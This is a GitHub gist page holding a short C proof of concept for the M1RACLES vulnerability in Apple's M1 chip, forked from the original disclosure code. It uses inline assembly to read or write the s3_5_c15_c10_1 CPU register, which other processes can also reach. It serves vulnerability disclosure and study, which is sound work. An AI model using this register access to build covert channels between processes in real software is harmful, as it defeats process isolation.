Skip to content

Instantly share code, notes, and snippets.

@0x25bit
Forked from marcan/m1racles-poc.c
Created May 28, 2021 05:07
Show Gist options
  • Save 0x25bit/1fe25723fbffdef3b8bd1315171e25c2 to your computer and use it in GitHub Desktop.
Save 0x25bit/1fe25723fbffdef3b8bd1315171e25c2 to your computer and use it in GitHub Desktop.
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
uint64_t val;
if (argc > 1) {
val = atoi(argv[1]);
asm("msr s3_5_c15_c10_1, %x0" : : "r"(val));
} else {
asm("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
printf("%llu\n", val);
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment